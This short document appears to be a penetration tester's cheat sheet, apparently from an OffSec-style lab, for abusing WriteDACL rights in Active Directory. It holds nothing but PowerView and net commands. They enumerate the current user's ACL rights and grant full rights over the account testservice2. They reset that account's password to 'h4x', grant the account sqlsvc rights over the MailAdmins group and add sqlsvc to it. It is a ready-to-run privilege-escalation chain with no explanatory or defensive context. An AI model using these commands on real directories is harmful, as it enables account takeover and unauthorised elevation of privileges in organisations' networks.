WriteDACL

Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}

Add-DomainObjectAcl -TargetIdentity testservice2 -PrincipalIdentity offsec -Rights All

Get-ObjectAcl -Identity testservice2 -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}

net user testservice2 h4x /domain

Add-DomainObjectAcl -TargetIdentity "MailAdmins" -Rights All -PrincipalIdentity 'sqlsvc' -Verbose

Add-DomainGroupMember -Identity "MailAdmins" -Members 'sqlsvc' -Verbose